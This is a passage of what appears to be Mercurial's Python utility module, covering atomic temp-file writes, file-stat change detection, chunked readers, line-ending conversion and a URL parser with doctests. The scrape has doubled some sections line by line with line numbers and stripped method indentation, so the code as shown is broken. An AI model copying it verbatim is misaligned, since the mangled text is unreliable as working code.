    # the same filesystem
    fd, temp = tempfile.mkstemp(prefix='.%s-' % fn, suffix='~', dir=d)
    os.close(fd)
    # Temporary files are created with mode 0600, which is usually not
    # what we want. If the original file already exists, just copy
    # its mode. Otherwise, manually obey umask.
    copymode(name, temp, createmode)
    if emptyok:
        return temp
    try:
        try:
            ifp = posixfile(name, "rb")
        except IOError as inst:
            # a missing source simply means "nothing to copy"
            if inst.errno == errno.ENOENT:
                return temp
            if not getattr(inst, 'filename', None):
                inst.filename = name
            raise
        ofp = posixfile(temp, "wb")
        for chunk in filechunkiter(ifp):
            ofp.write(chunk)
        ifp.close()
        ofp.close()
    except: # re-raises
        # don't leave a partially-written temp file behind
        try:
            os.unlink(temp)
        except OSError:
            pass
        raise
    return temp
1957
1957
class filestat(object):
    """help to exactly detect change of a file

    'stat' attribute is result of 'os.stat()' if specified 'path'
    exists. Otherwise, it is None. This can avoid preparative
    'exists()' examination on client side of this class.
    """
    def __init__(self, stat):
        # stat: an os.stat() result, or None when the file doesn't exist
        self.stat = stat

    @classmethod
    def frompath(cls, path):
        """Build a filestat for path; a missing file yields stat=None."""
        try:
            stat = os.stat(path)
        except OSError as err:
            if err.errno != errno.ENOENT:
                raise
            stat = None
        return cls(stat)

    @classmethod
    def fromfp(cls, fp):
        """Build a filestat from an already-open file object."""
        stat = os.fstat(fp.fileno())
        return cls(stat)

    # keep identity-based hashing even though __eq__ is overridden
    __hash__ = object.__hash__

    def __eq__(self, old):
        try:
            # if ambiguity between stat of new and old file is
            # avoided, comparison of size, ctime and mtime is enough
            # to exactly detect change of a file regardless of platform
            return (self.stat.st_size == old.stat.st_size and
                    self.stat[stat.ST_CTIME] == old.stat[stat.ST_CTIME] and
                    self.stat[stat.ST_MTIME] == old.stat[stat.ST_MTIME])
        except AttributeError:
            pass
        try:
            # both sides must represent a missing file to compare equal
            return self.stat is None and old.stat is None
        except AttributeError:
            return False

    def isambig(self, old):
        """Examine whether new (= self) stat is ambiguous against old one

        "S[N]" below means stat of a file at N-th change:

        - S[n-1].ctime < S[n].ctime: can detect change of a file
        - S[n-1].ctime == S[n].ctime
          - S[n-1].ctime < S[n].mtime: means natural advancing (*1)
          - S[n-1].ctime == S[n].mtime: is ambiguous (*2)
          - S[n-1].ctime > S[n].mtime: never occurs naturally (don't care)
        - S[n-1].ctime > S[n].ctime: never occurs naturally (don't care)

        Case (*2) above means that a file was changed twice or more at
        same time in sec (= S[n-1].ctime), and comparison of timestamp
        is ambiguous.

        Base idea to avoid such ambiguity is "advance mtime 1 sec, if
        timestamp is ambiguous".

        But advancing mtime only in case (*2) doesn't work as
        expected, because naturally advanced S[n].mtime in case (*1)
        might be equal to manually advanced S[n-1 or earlier].mtime.

        Therefore, all "S[n-1].ctime == S[n].ctime" cases should be
        treated as ambiguous regardless of mtime, to avoid overlooking
        by confliction between such mtime.

        Advancing mtime "if isambig(oldstat)" ensures "S[n-1].mtime !=
        S[n].mtime", even if size of a file isn't changed.
        """
        try:
            return (self.stat[stat.ST_CTIME] == old.stat[stat.ST_CTIME])
        except AttributeError:
            # one of the stats is None (missing file): not ambiguous
            return False

    def avoidambig(self, path, old):
        """Change file stat of specified path to avoid ambiguity

        'old' should be previous filestat of 'path'.

        This skips avoiding ambiguity, if a process doesn't have
        appropriate privileges for 'path'. This returns False in this
        case.

        Otherwise, this returns True, as "ambiguity is avoided".
        """
        # advance mtime by one second, wrapping to stay in signed 32 bits
        advanced = (old.stat[stat.ST_MTIME] + 1) & 0x7fffffff
        try:
            os.utime(path, (advanced, advanced))
        except OSError as inst:
            if inst.errno == errno.EPERM:
                # utime() on the file created by another user causes EPERM,
                # if a process doesn't have appropriate privileges
                return False
            raise
        return True

    def __ne__(self, other):
        return not self == other
2059
2059
class atomictempfile(object):
    '''writable file object that atomically updates a file

    All writes will go to a temporary copy of the original file. Call
    close() when you are done writing, and atomictempfile will rename
    the temporary copy to the original name, making the changes
    visible. If the object is destroyed without being closed, all your
    writes are discarded.

    checkambig argument of constructor is used with filestat, and is
    useful only if target file is guarded by any lock (e.g. repo.lock
    or repo.wlock).
    '''
    def __init__(self, name, mode='w+b', createmode=None, checkambig=False):
        self.__name = name # permanent name
        self._tempname = mktempcopy(name, emptyok=('w' in mode),
                                    createmode=createmode)
        self._fp = posixfile(self._tempname, mode)
        self._checkambig = checkambig

        # delegated methods
        self.read = self._fp.read
        self.write = self._fp.write
        self.seek = self._fp.seek
        self.tell = self._fp.tell
        self.fileno = self._fp.fileno

    def close(self):
        # publish the temp copy: close it, then rename it over the target;
        # with checkambig, also nudge mtime if the new stat is ambiguous
        # against the pre-rename one
        if not self._fp.closed:
            self._fp.close()
            filename = localpath(self.__name)
            oldstat = self._checkambig and filestat.frompath(filename)
            if oldstat and oldstat.stat:
                rename(self._tempname, filename)
                newstat = filestat.frompath(filename)
                if newstat.isambig(oldstat):
                    # stat of changed file is ambiguous to original one
                    advanced = (oldstat.stat[stat.ST_MTIME] + 1) & 0x7fffffff
                    os.utime(filename, (advanced, advanced))
            else:
                rename(self._tempname, filename)

    def discard(self):
        # abandon all writes: remove the temp file without touching the
        # target
        if not self._fp.closed:
            try:
                os.unlink(self._tempname)
            except OSError:
                pass
            self._fp.close()

    def __del__(self):
        if safehasattr(self, '_fp'): # constructor actually did something
            self.discard()

    def __enter__(self):
        return self

    def __exit__(self, exctype, excvalue, traceback):
        # commit on clean exit, discard if an exception is propagating
        if exctype is not None:
            self.discard()
        else:
            self.close()
2122
2122
def unlinkpath(f, ignoremissing=False):
    """unlink and remove the directory if it is empty"""
    remove = tryunlink if ignoremissing else unlink
    remove(f)
    # prune parent directories that may now be empty, best effort
    try:
        removedirs(os.path.dirname(f))
    except OSError:
        pass
2134
2134
def tryunlink(f):
    """Attempt to remove a file, ignoring ENOENT errors."""
    try:
        unlink(f)
    except OSError as err:
        # a missing file is fine; anything else propagates
        if err.errno == errno.ENOENT:
            return
        raise
2142
2142
def makedirs(name, mode=None, notindexed=False):
    """recursive directory creation with parent mode inheritance

    Newly created directories are marked as "not to be indexed by
    the content indexing service", if ``notindexed`` is specified
    for "write" mode access.
    """
    try:
        makedir(name, notindexed)
    except OSError as err:
        if err.errno == errno.EEXIST:
            # already there: nothing to create (mode is not re-applied)
            return
        if err.errno != errno.ENOENT or not name:
            raise
        # missing parent: create ancestors first, then retry this level
        parent = os.path.dirname(os.path.abspath(name))
        if parent == name:
            # reached the filesystem root without success
            raise
        makedirs(parent, mode, notindexed)
        try:
            makedir(name, notindexed)
        except OSError as err:
            # Catch EEXIST to handle races
            if err.errno == errno.EEXIST:
                return
            raise
    if mode is not None:
        os.chmod(name, mode)
2170
2170
def readfile(path):
    """Return the entire contents of path as bytes."""
    fp = open(path, 'rb')
    try:
        return fp.read()
    finally:
        fp.close()
2174
2174
def writefile(path, text):
    """Replace the contents of path with text (bytes)."""
    fp = open(path, 'wb')
    try:
        fp.write(text)
    finally:
        fp.close()
2178
2178
def appendfile(path, text):
    """Append text (bytes) to the file at path, creating it if needed."""
    fp = open(path, 'ab')
    try:
        fp.write(text)
    finally:
        fp.close()
2182
2182
2183 class chunkbuffer(object):
2183 class chunkbuffer(object):
2184 """Allow arbitrary sized chunks of data to be efficiently read from an
2184 """Allow arbitrary sized chunks of data to be efficiently read from an
2185 iterator over chunks of arbitrary size."""
2185 iterator over chunks of arbitrary size."""
2186
2186
2187 def __init__(self, in_iter):
2187 def __init__(self, in_iter):
2188 """in_iter is the iterator that's iterating over the input chunks."""
2188 """in_iter is the iterator that's iterating over the input chunks."""
2189 def splitbig(chunks):
2189 def splitbig(chunks):
2190 for chunk in chunks:
2190 for chunk in chunks:
2191 if len(chunk) > 2**20:
2191 if len(chunk) > 2**20:
2192 pos = 0
2192 pos = 0
2193 while pos < len(chunk):
2193 while pos < len(chunk):
2194 end = pos + 2 ** 18
2194 end = pos + 2 ** 18
2195 yield chunk[pos:end]
2195 yield chunk[pos:end]
2196 pos = end
2196 pos = end
2197 else:
2197 else:
2198 yield chunk
2198 yield chunk
2199 self.iter = splitbig(in_iter)
2199 self.iter = splitbig(in_iter)
2200 self._queue = collections.deque()
2200 self._queue = collections.deque()
2201 self._chunkoffset = 0
2201 self._chunkoffset = 0
2202
2202
def read(self, l=None):
    """Read L bytes of data from the iterator of chunks of data.
    Returns less than L bytes if the iterator runs dry.

    If size parameter is omitted, read everything"""
    if l is None:
        # No size: drain the source iterator completely in one join.
        return ''.join(self.iter)

    left = l
    buf = []
    queue = self._queue
    while left > 0:
        # refill the queue: buffer roughly 256KB from the source iterator
        if not queue:
            target = 2**18
            for chunk in self.iter:
                queue.append(chunk)
                target -= len(chunk)
                if target <= 0:
                    break
            # source iterator is exhausted; return what we have
            if not queue:
                break

        # The easy way to do this would be to queue.popleft(), modify the
        # chunk (if necessary), then queue.appendleft(). However, for cases
        # where we read partial chunk content, this incurs 2 dequeue
        # mutations and creates a new str for the remaining chunk in the
        # queue. Our code below avoids this overhead.

        chunk = queue[0]
        chunkl = len(chunk)
        offset = self._chunkoffset

        # Use full chunk.
        if offset == 0 and left >= chunkl:
            left -= chunkl
            queue.popleft()
            buf.append(chunk)
            # self._chunkoffset remains at 0.
            continue

        chunkremaining = chunkl - offset

        # Use all of unconsumed part of chunk.
        if left >= chunkremaining:
            left -= chunkremaining
            queue.popleft()
            # offset == 0 is enabled by block above, so this won't merely
            # copy via ``chunk[0:]``.
            buf.append(chunk[offset:])
            self._chunkoffset = 0

        # Partial chunk needed.
        else:
            buf.append(chunk[offset:offset + left])
            self._chunkoffset += left
            # left goes negative here, which terminates the loop.
            left -= chunkremaining

    return ''.join(buf)
2262
2262
def filechunkiter(f, size=131072, limit=None):
    """Create a generator that produces the data in the file size
    (default 131072) bytes at a time, up to optional limit (default is
    to read all data). Chunks may be less than size bytes if the
    chunk is the last chunk in the file, or the file is a socket or
    some other type of file that sometimes reads less data than is
    requested."""
    assert size >= 0
    assert limit is None or limit >= 0
    while True:
        # Never request more than the remaining budget allows.
        nbytes = size if limit is None else min(limit, size)
        # nbytes == 0 short-circuits: the budget is spent, stop reading.
        s = nbytes and f.read(nbytes)
        if not s:
            break
        if limit:
            limit -= len(s)
        yield s
2283
2283
class cappedreader(object):
    """Proxy around a file object that caps total bytes read at N.

    Reads are forwarded to the wrapped file object until the byte budget
    given at construction time is exhausted; after that every read behaves
    as if EOF had been reached.

    The wrapped file object must not be read from independently while a
    cappedreader is in use, or the internal accounting will diverge from
    the real stream position and results become undefined.
    """
    def __init__(self, fh, limit):
        """Allow reading up to <limit> bytes from <fh>."""
        self._fh = fh
        self._left = limit

    def read(self, n=-1):
        remaining = self._left
        # Budget exhausted: report EOF.
        if not remaining:
            return b''

        # A negative size means "read everything still allowed".
        if n < 0:
            n = remaining

        data = self._fh.read(min(n, remaining))
        self._left = remaining - len(data)
        assert self._left >= 0

        return data

    def readinto(self, b):
        # Emulate io.RawIOBase.readinto() on top of read().
        data = self.read(len(b))
        if data is None:
            return None

        count = len(data)
        b[0:count] = data
        return count
2320
2320
def unitcountfn(*unittable):
    '''return a function that renders a readable count of some quantity'''

    def render(count):
        # Walk the table from the largest unit down; the first row whose
        # threshold (multiplier * divisor) the magnitude reaches wins.
        magnitude = abs(count)
        for multiplier, divisor, fmt in unittable:
            if magnitude >= divisor * multiplier:
                return fmt % (count / float(divisor))
        # Below every threshold: fall back to the smallest unit's format.
        return unittable[-1][2] % count

    return render
2331
2331
def processlinerange(fromline, toline):
    """Validate the 1-based line range <fromline>:<toline> and convert it
    to a 0-based (start, stop) pair.

    >>> processlinerange(10, 20)
    (9, 20)
    >>> processlinerange(2, 1)
    Traceback (most recent call last):
      ...
    ParseError: line range must be positive
    >>> processlinerange(0, 5)
    Traceback (most recent call last):
      ...
    ParseError: fromline must be strictly positive
    """
    # Reject inverted ranges first, then a start before line 1.
    if toline < fromline:
        raise error.ParseError(_("line range must be positive"))
    if fromline < 1:
        raise error.ParseError(_("fromline must be strictly positive"))
    return fromline - 1, toline
2352
2352
# Render a byte quantity as a human-readable string. The table is ordered
# from the largest to the smallest unit; the first row whose threshold
# (multiplier * divisor) the value reaches determines the format used, so
# e.g. 100 GB and up prints with no decimals while 1-10 GB gets two.
bytecount = unitcountfn(
    (100, 1 << 30, _('%.0f GB')),
    (10, 1 << 30, _('%.1f GB')),
    (1, 1 << 30, _('%.2f GB')),
    (100, 1 << 20, _('%.0f MB')),
    (10, 1 << 20, _('%.1f MB')),
    (1, 1 << 20, _('%.2f MB')),
    (100, 1 << 10, _('%.0f KB')),
    (10, 1 << 10, _('%.1f KB')),
    (1, 1 << 10, _('%.2f KB')),
    (1, 1, _('%.0f bytes')),
    )
2365
2365
class transformingwriter(object):
    """Writable file proxy that pipes every write through an encode function."""

    def __init__(self, fp, encode):
        # ``encode`` is applied to each chunk before it reaches ``fp``.
        self._fp = fp
        self._encode = encode

    def close(self):
        # Delegate lifecycle management to the wrapped file.
        self._fp.close()

    def flush(self):
        self._fp.flush()

    def write(self, data):
        # Transform first, then delegate; propagate the underlying return
        # value so callers can observe the number of bytes written.
        return self._fp.write(self._encode(data))
2381
2381
# Matches a single EOL which can either be a CRLF where repeated CR
# are removed or a LF. We do not care about old Macintosh files, so a
# stray CR is an error.
_eolre = remod.compile(br'\r*\n')

def tolf(s):
    """Normalize all line endings in the bytes ``s`` to LF."""
    # The replacement is an explicit bytes literal to match the bytes
    # pattern above; an unprefixed literal would be str on Python 3 and
    # make sub() raise TypeError.
    return _eolre.sub(b'\n', s)

def tocrlf(s):
    """Normalize all line endings in the bytes ``s`` to CRLF."""
    return _eolre.sub(b'\r\n', s)

def _crlfwriter(fp):
    """Wrap ``fp`` so written data has its line endings converted to CRLF."""
    return transformingwriter(fp, tocrlf)
2395
2395
# Conversions between platform-native line endings and LF. On CRLF
# platforms (i.e. Windows) real conversion is required; everywhere else
# these are identity operations.
_nativecrlf = pycompat.oslinesep == '\r\n'

tonativeeol = tocrlf if _nativecrlf else pycompat.identity
fromnativeeol = tolf if _nativecrlf else pycompat.identity
nativeeolwriter = _crlfwriter if _nativecrlf else pycompat.identity
2404
2404
if (pyplatform.python_implementation() == 'CPython' and
    sys.version_info < (3, 0)):
    # There is an issue in CPython that some IO methods do not handle EINTR
    # correctly. The following table shows what CPython version (and functions)
    # are affected (buggy: has the EINTR bug, okay: otherwise):
    #
    #                | < 2.7.4 | 2.7.4 to 2.7.12 | >= 3.0
    #   --------------------------------------------------
    #    fp.__iter__ | buggy   | buggy           | okay
    #    fp.read*    | buggy   | okay [1]        | okay
    #
    # [1]: fixed by changeset 67dc99a989cd in the cpython hg repo.
    #
    # Here we workaround the EINTR issue for fileobj.__iter__. Other methods
    # like "read*" are ignored for now, as Python < 2.7.4 is a minority.
    #
    # Although we can workaround the EINTR issue for fp.__iter__, it is slower:
    # "for x in fp" is 4x faster than "for x in iter(fp.readline, '')" in
    # CPython 2, because CPython 2 maintains an internal readahead buffer for
    # fp.__iter__ but not other fp.read* methods.
    #
    # On modern systems like Linux, the "read" syscall cannot be interrupted
    # when reading "fast" files like on-disk files. So the EINTR issue only
    # affects things like pipes, sockets, ttys etc. We treat "normal" (S_ISREG)
    # files approximately as "fast" files and use the fast (unsafe) code path,
    # to minimize the performance impact.
    if sys.version_info >= (2, 7, 4):
        # fp.readline deals with EINTR correctly, use it as a workaround.
        def _safeiterfile(fp):
            return iter(fp.readline, '')
    else:
        # fp.read* are broken too, manually deal with EINTR in a stupid way.
        # note: this may block longer than necessary because of bufsize.
        def _safeiterfile(fp, bufsize=4096):
            # EINTR-safe line iterator built directly on os.read().
            fd = fp.fileno()
            line = ''
            while True:
                try:
                    buf = os.read(fd, bufsize)
                except OSError as ex:
                    # os.read only raises EINTR before any data is read
                    if ex.errno == errno.EINTR:
                        continue
                    else:
                        raise
                line += buf
                if '\n' in buf:
                    splitted = line.splitlines(True)
                    line = ''
                    for l in splitted:
                        if l[-1] == '\n':
                            yield l
                        else:
                            # keep the trailing partial line for next round
                            line = l
                if not buf:
                    break
            if line:
                yield line

    def iterfile(fp):
        """Return an iterator of lines of fp, safe against EINTR.

        Regular on-disk files are treated as "fast" and returned
        unchanged; "slow" files (pipes, sockets, ttys) go through the
        EINTR workaround above.
        """
        fastpath = True
        # 'file' here is the Python 2 builtin type for plain files.
        if type(fp) is file:
            fastpath = stat.S_ISREG(os.fstat(fp.fileno()).st_mode)
        if fastpath:
            return fp
        else:
            return _safeiterfile(fp)
else:
    # PyPy and CPython 3 do not have the EINTR issue thus no workaround needed.
    def iterfile(fp):
        """Return an iterator of lines of fp (no workaround required here)."""
        return fp
2476
2476
def iterlines(iterator):
    """Yield the individual lines of every chunk produced by *iterator*.

    Line terminators are stripped (splitlines() semantics).
    """
    for block in iterator:
        for ln in block.splitlines():
            yield ln
2481
2481
def expandpath(path):
    """Expand environment variables and a user home marker in *path*."""
    # $VAR / ${VAR} substitution first, then ~user expansion.
    withvars = os.path.expandvars(path)
    return os.path.expanduser(withvars)
2484
2484
def interpolate(prefix, mapping, s, fn=None, escape_prefix=False):
    """Return the result of interpolating items in the mapping into string s.

    prefix is a single character string, or a two character string with
    a backslash as the first character if the prefix needs to be escaped in
    a regular expression.

    fn is an optional function that will be applied to the replacement text
    just before replacement.

    escape_prefix is an optional flag that allows using doubled prefix for
    its escaping.
    """
    fn = fn or (lambda s: s)
    # Explicit bytes literals throughout: the compiled pattern below is
    # bytes (br''), so joining or concatenating with str would raise
    # TypeError on Python 3.
    patterns = b'|'.join(mapping.keys())
    if escape_prefix:
        patterns += b'|' + prefix
        if len(prefix) > 1:
            prefix_char = prefix[1:]
        else:
            prefix_char = prefix
        # NOTE: mutates the caller's mapping so the prefix maps to itself.
        mapping[prefix_char] = prefix_char
    r = remod.compile(br'%s(%s)' % (prefix, patterns))
    return r.sub(lambda x: fn(mapping[x.group()[1:]]), s)
2509
2509
def getport(port):
    """Return the port for a given network service.

    If port is an integer, it's returned as is. If it's a string, it's
    looked up using socket.getservbyname(). If there's no matching
    service, error.Abort is raised.
    """
    # Numeric ports (int, or a numeric string) take the fast path.
    try:
        return int(port)
    except ValueError:
        pass

    # Otherwise resolve a symbolic service name, e.g. 'http' -> 80.
    try:
        return socket.getservbyname(pycompat.sysstr(port))
    except socket.error:
        raise error.Abort(_("no port number associated with service '%s'")
                          % port)
2527
2527
2528 class url(object):
2528 class url(object):
2529 r"""Reliable URL parser.
2529 r"""Reliable URL parser.
2530
2530
2531 This parses URLs and provides attributes for the following
2531 This parses URLs and provides attributes for the following
2532 components:
2532 components:
2533
2533
2534 <scheme>://<user>:<passwd>@<host>:<port>/<path>?<query>#<fragment>
2534 <scheme>://<user>:<passwd>@<host>:<port>/<path>?<query>#<fragment>
2535
2535
2536 Missing components are set to None. The only exception is
2536 Missing components are set to None. The only exception is
2537 fragment, which is set to '' if present but empty.
2537 fragment, which is set to '' if present but empty.
2538
2538
2539 If parsefragment is False, fragment is included in query. If
2539 If parsefragment is False, fragment is included in query. If
2540 parsequery is False, query is included in path. If both are
2540 parsequery is False, query is included in path. If both are
2541 False, both fragment and query are included in path.
2541 False, both fragment and query are included in path.
2542
2542
2543 See http://www.ietf.org/rfc/rfc2396.txt for more information.
2543 See http://www.ietf.org/rfc/rfc2396.txt for more information.
2544
2544
2545 Note that for backward compatibility reasons, bundle URLs do not
2545 Note that for backward compatibility reasons, bundle URLs do not
2546 take host names. That means 'bundle://../' has a path of '../'.
2546 take host names. That means 'bundle://../' has a path of '../'.
2547
2547
2548 Examples:
2548 Examples:
2549
2549
2550 >>> url(b'http://www.ietf.org/rfc/rfc2396.txt')
2550 >>> url(b'http://www.ietf.org/rfc/rfc2396.txt')
2551 <url scheme: 'http', host: 'www.ietf.org', path: 'rfc/rfc2396.txt'>
2551 <url scheme: 'http', host: 'www.ietf.org', path: 'rfc/rfc2396.txt'>
2552 >>> url(b'ssh://[::1]:2200//home/joe/repo')
2552 >>> url(b'ssh://[::1]:2200//home/joe/repo')
2553 <url scheme: 'ssh', host: '[::1]', port: '2200', path: '/home/joe/repo'>
2553 <url scheme: 'ssh', host: '[::1]', port: '2200', path: '/home/joe/repo'>
2554 >>> url(b'file:///home/joe/repo')
2554 >>> url(b'file:///home/joe/repo')
2555 <url scheme: 'file', path: '/home/joe/repo'>
2555 <url scheme: 'file', path: '/home/joe/repo'>
2556 >>> url(b'file:///c:/temp/foo/')
2556 >>> url(b'file:///c:/temp/foo/')
2557 <url scheme: 'file', path: 'c:/temp/foo/'>
2557 <url scheme: 'file', path: 'c:/temp/foo/'>
2558 >>> url(b'bundle:foo')
2558 >>> url(b'bundle:foo')
2559 <url scheme: 'bundle', path: 'foo'>
2559 <url scheme: 'bundle', path: 'foo'>
2560 >>> url(b'bundle://../foo')
2560 >>> url(b'bundle://../foo')
2561 <url scheme: 'bundle', path: '../foo'>
2561 <url scheme: 'bundle', path: '../foo'>
2562 >>> url(br'c:\foo\bar')
2562 >>> url(br'c:\foo\bar')
2563 <url path: 'c:\\foo\\bar'>
2563 <url path: 'c:\\foo\\bar'>
2564 >>> url(br'\\blah\blah\blah')
2564 >>> url(br'\\blah\blah\blah')
2565 <url path: '\\\\blah\\blah\\blah'>
2565 <url path: '\\\\blah\\blah\\blah'>
2566 >>> url(br'\\blah\blah\blah#baz')
2566 >>> url(br'\\blah\blah\blah#baz')
2567 <url path: '\\\\blah\\blah\\blah', fragment: 'baz'>
2567 <url path: '\\\\blah\\blah\\blah', fragment: 'baz'>
2568 >>> url(br'file:///C:\users\me')
2568 >>> url(br'file:///C:\users\me')
2569 <url scheme: 'file', path: 'C:\\users\\me'>
2569 <url scheme: 'file', path: 'C:\\users\\me'>
2570
2570
2571 Authentication credentials:
2571 Authentication credentials:
2572
2572
2573 >>> url(b'ssh://joe:xyz@x/repo')
2573 >>> url(b'ssh://joe:xyz@x/repo')
2574 <url scheme: 'ssh', user: 'joe', passwd: 'xyz', host: 'x', path: 'repo'>
2574 <url scheme: 'ssh', user: 'joe', passwd: 'xyz', host: 'x', path: 'repo'>
2575 >>> url(b'ssh://joe@x/repo')
2575 >>> url(b'ssh://joe@x/repo')
2576 <url scheme: 'ssh', user: 'joe', host: 'x', path: 'repo'>
2576 <url scheme: 'ssh', user: 'joe', host: 'x', path: 'repo'>
2577
2577
2578 Query strings and fragments:
2578 Query strings and fragments:
2579
2579
2580 >>> url(b'http://host/a?b#c')
2580 >>> url(b'http://host/a?b#c')
2581 <url scheme: 'http', host: 'host', path: 'a', query: 'b', fragment: 'c'>
2581 <url scheme: 'http', host: 'host', path: 'a', query: 'b', fragment: 'c'>
2582 >>> url(b'http://host/a?b#c', parsequery=False, parsefragment=False)
2582 >>> url(b'http://host/a?b#c', parsequery=False, parsefragment=False)
2583 <url scheme: 'http', host: 'host', path: 'a?b#c'>
2583 <url scheme: 'http', host: 'host', path: 'a?b#c'>
2584
2584
2585 Empty path:
2585 Empty path:
2586
2586
2587 >>> url(b'')
2587 >>> url(b'')
2588 <url path: ''>
2588 <url path: ''>
2589 >>> url(b'#a')
2589 >>> url(b'#a')
2590 <url path: '', fragment: 'a'>
2590 <url path: '', fragment: 'a'>
2591 >>> url(b'http://host/')
2591 >>> url(b'http://host/')
2592 <url scheme: 'http', host: 'host', path: ''>
2592 <url scheme: 'http', host: 'host', path: ''>
2593 >>> url(b'http://host/#a')
2593 >>> url(b'http://host/#a')
2594 <url scheme: 'http', host: 'host', path: '', fragment: 'a'>
2594 <url scheme: 'http', host: 'host', path: '', fragment: 'a'>
2595
2595
2596 Only scheme:
2596 Only scheme:
2597
2597
2598 >>> url(b'http:')
2598 >>> url(b'http:')
2599 <url scheme: 'http'>
2599 <url scheme: 'http'>
2600 """
2600 """
2601
2601
2602 _safechars = "!~*'()+"
2602 _safechars = "!~*'()+"
2603 _safepchars = "/!~*'()+:\\"
2603 _safepchars = "/!~*'()+:\\"
2604 _matchscheme = remod.compile('^[a-zA-Z0-9+.\\-]+:').match
2604 _matchscheme = remod.compile('^[a-zA-Z0-9+.\\-]+:').match
2605
2605
def __init__(self, path, parsequery=True, parsefragment=True):
    """Parse *path* into URL components; see the class docstring for the
    component attributes and examples."""
    # We slowly chomp away at path until we have only the path left
    self.scheme = self.user = self.passwd = self.host = None
    self.port = self.path = self.query = self.fragment = None
    # _localpath stays True for plain filesystem paths (no scheme).
    self._localpath = True
    self._hostport = ''
    self._origpath = path

    if parsefragment and '#' in path:
        path, self.fragment = path.split('#', 1)

    # special case for Windows drive letters and UNC paths
    if hasdriveletter(path) or path.startswith('\\\\'):
        self.path = path
        return

    # For compatibility reasons, we can't handle bundle paths as
    # normal URLS
    if path.startswith('bundle:'):
        self.scheme = 'bundle'
        path = path[7:]
        if path.startswith('//'):
            path = path[2:]
        self.path = path
        return

    if self._matchscheme(path):
        parts = path.split(':', 1)
        if parts[0]:
            self.scheme, path = parts
            self._localpath = False

    if not path:
        path = None
        if self._localpath:
            self.path = ''
            return
    else:
        if self._localpath:
            self.path = path
            return

    if parsequery and '?' in path:
        path, self.query = path.split('?', 1)
        if not path:
            path = None
        if not self.query:
            self.query = None

    # // is required to specify a host/authority
    if path and path.startswith('//'):
        parts = path[2:].split('/', 1)
        if len(parts) > 1:
            self.host, path = parts
        else:
            self.host = parts[0]
            path = None
        if not self.host:
            self.host = None
            # path of file:///d is /d
            # path of file:///d:/ is d:/, not /d:/
            if path and not hasdriveletter(path):
                path = '/' + path

    if self.host and '@' in self.host:
        self.user, self.host = self.host.rsplit('@', 1)
        if ':' in self.user:
            self.user, self.passwd = self.user.split(':', 1)
        if not self.host:
            self.host = None

    # Don't split on colons in IPv6 addresses without ports
    if (self.host and ':' in self.host and
        not (self.host.startswith('[') and self.host.endswith(']'))):
        self._hostport = self.host
        self.host, self.port = self.host.rsplit(':', 1)
        if not self.host:
            self.host = None

    if (self.host and self.scheme == 'file' and
        self.host not in ('localhost', '127.0.0.1', '[::1]')):
        raise error.Abort(_('file:// URLs can only refer to localhost'))

    self.path = path

    # leave the query string escaped
    for a in ('user', 'passwd', 'host', 'port',
              'path', 'fragment'):
        v = getattr(self, a)
        if v is not None:
            setattr(self, a, urlreq.unquote(v))
2697
2697
@encoding.strmethod
def __repr__(self):
    """Return a debug representation listing every non-None component."""
    names = ('scheme', 'user', 'passwd', 'host', 'port', 'path',
             'query', 'fragment')
    attrs = ['%s: %r' % (name, getattr(self, name))
             for name in names
             if getattr(self, name) is not None]
    return '<url %s>' % ', '.join(attrs)
2707
2707
    def __bytes__(self):
        r"""Join the URL's components back into a URL string.

        Examples:

        >>> bytes(url(b'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'))
        'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'
        >>> bytes(url(b'http://user:pw@host:80/?foo=bar&baz=42'))
        'http://user:pw@host:80/?foo=bar&baz=42'
        >>> bytes(url(b'http://user:pw@host:80/?foo=bar%3dbaz'))
        'http://user:pw@host:80/?foo=bar%3dbaz'
        >>> bytes(url(b'ssh://user:pw@[::1]:2200//home/joe#'))
        'ssh://user:pw@[::1]:2200//home/joe#'
        >>> bytes(url(b'http://localhost:80//'))
        'http://localhost:80//'
        >>> bytes(url(b'http://localhost:80/'))
        'http://localhost:80/'
        >>> bytes(url(b'http://localhost:80'))
        'http://localhost:80/'
        >>> bytes(url(b'bundle:foo'))
        'bundle:foo'
        >>> bytes(url(b'bundle://../foo'))
        'bundle:../foo'
        >>> bytes(url(b'path'))
        'path'
        >>> bytes(url(b'file:///tmp/foo/bar'))
        'file:///tmp/foo/bar'
        >>> bytes(url(b'file:///c:/tmp/foo/bar'))
        'file:///c:/tmp/foo/bar'
        >>> print(url(br'bundle:foo\bar'))
        bundle:foo\bar
        >>> print(url(br'file:///D:\data\hg'))
        file:///D:\data\hg
        """
        # Local-path style URLs (plain paths, bundle:...) are rebuilt
        # from path + optional fragment only.
        if self._localpath:
            s = self.path
            if self.scheme == 'bundle':
                s = 'bundle:' + s
            if self.fragment:
                s += '#' + self.fragment
            return s

        s = self.scheme + ':'
        if self.user or self.passwd or self.host:
            s += '//'
        elif self.scheme and (not self.path or self.path.startswith('/')
                              or hasdriveletter(self.path)):
            # schemes like file:// keep the '//' even with no authority;
            # drive letters additionally need a leading '/'
            s += '//'
            if hasdriveletter(self.path):
                s += '/'
        if self.user:
            s += urlreq.quote(self.user, safe=self._safechars)
        if self.passwd:
            s += ':' + urlreq.quote(self.passwd, safe=self._safechars)
        if self.user or self.passwd:
            s += '@'
        if self.host:
            # bracketed IPv6 literals must not be percent-quoted
            if not (self.host.startswith('[') and self.host.endswith(']')):
                s += urlreq.quote(self.host)
            else:
                s += self.host
        if self.port:
            s += ':' + urlreq.quote(self.port)
        if self.host:
            s += '/'
        if self.path:
            # TODO: similar to the query string, we should not unescape the
            # path when we store it, the path might contain '%2f' = '/',
            # which we should *not* escape.
            s += urlreq.quote(self.path, safe=self._safepchars)
        if self.query:
            # we store the query in escaped form.
            s += '?' + self.query
        if self.fragment is not None:
            s += '#' + urlreq.quote(self.fragment, safe=self._safepchars)
        return s

    # str() goes through encoding.strmethod, which adapts __bytes__ to
    # return a native string on Python 3.
    __str__ = encoding.strmethod(__bytes__)
2786
2786
    def authinfo(self):
        """Return (url_without_credentials, authinfo) for this URL.

        The first element is the URL string with user/password stripped.
        The second is None when no user is set, otherwise a 4-tuple
        suitable for a urllib2 password manager.
        """
        user, passwd = self.user, self.passwd
        try:
            # temporarily drop the credentials so bytes(self) omits them;
            # always restored, even if stringification raises
            self.user, self.passwd = None, None
            s = bytes(self)
        finally:
            self.user, self.passwd = user, passwd
        if not self.user:
            return (s, None)
        # authinfo[1] is passed to urllib2 password manager, and its
        # URIs must not contain credentials. The host is passed in the
        # URIs list because Python < 2.4.3 uses only that to search for
